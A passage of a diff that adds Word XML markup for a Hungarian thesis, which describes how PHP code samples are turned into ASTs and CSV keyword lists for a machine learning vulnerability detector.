+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>pdo1.php</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, egy nem sérülékeny kód</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Az</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>57 darab sérülékeny és 45 darab nem sérülékeny kó</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> legelső lépésben </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">AST generáláson esik át, amihez az irodalomjegyzék [10] elemét használtam. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ez egy manuális folyamat volt, de a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>machine_learning_app</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>p</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>arser.js</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a grafikus felület által bekért kódra</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ezt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> már automatizálja</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>irodalomjegyzék [1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>] elem</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>e segítségével</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A PHP fájl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">okhoz generált </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AST fák</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>machine_learning_app</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tanulo_adatok</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AST</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mappábában </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">közel </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>azonos névvel helyezked</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nek </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>el</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>txt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kiterjesztéssel.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67F1A32B" wp14:editId="3C0D88AE">
+            <wp:extent cx="3791145" cy="1847945"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="10" name="Kép 10"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3791145" cy="1847945"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3.2-es ábra: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>machine_learning_app</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tanulo_adatok</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AST</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>pdo1_ast.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a 3.1-es ábra kódjának AST megfelelője</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\machine_learning_app\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nodes</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ezekkel dolgozik tovább</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Elsőként listázza és egy ciklussal sorra </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">beolvassa </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>machine_learning_app</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tanulo_adatok</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AST</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mappa .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>txt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kiterjesztésű fájljait</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>. M</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ajd </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ezek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>JSON felépítésű fájlok</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nak a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sorait kulcsok alapján szelektálja</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>(„</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”, „</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”, „</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>raw</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Ezek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z értéke</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>adják a fájlok fontos szavait és kifejezéseit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, így </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>azonos nevű .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>csv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kiterjesztésű fájlok</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> első oszlop</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>aiba</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> írja</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>az értékeket</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>listá</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>k</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ba fűzve.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D80A38E" wp14:editId="1B0F2926">
+            <wp:extent cx="5156465" cy="495325"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
+            <wp:docPr id="15" name="Kép 15"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5156465" cy="495325"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>3.3-as ábra</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>machine_learning_app</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tanulo_adatok</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AST</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>pdo1_as</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>t.csv</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, a nodes.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kimenete, a 3.2-es ábra bemenetre</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> következő lépésben a .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>csv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fájlokat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>fűzöm</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> össze</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\machine_learning_app\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tanulo_adatok</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
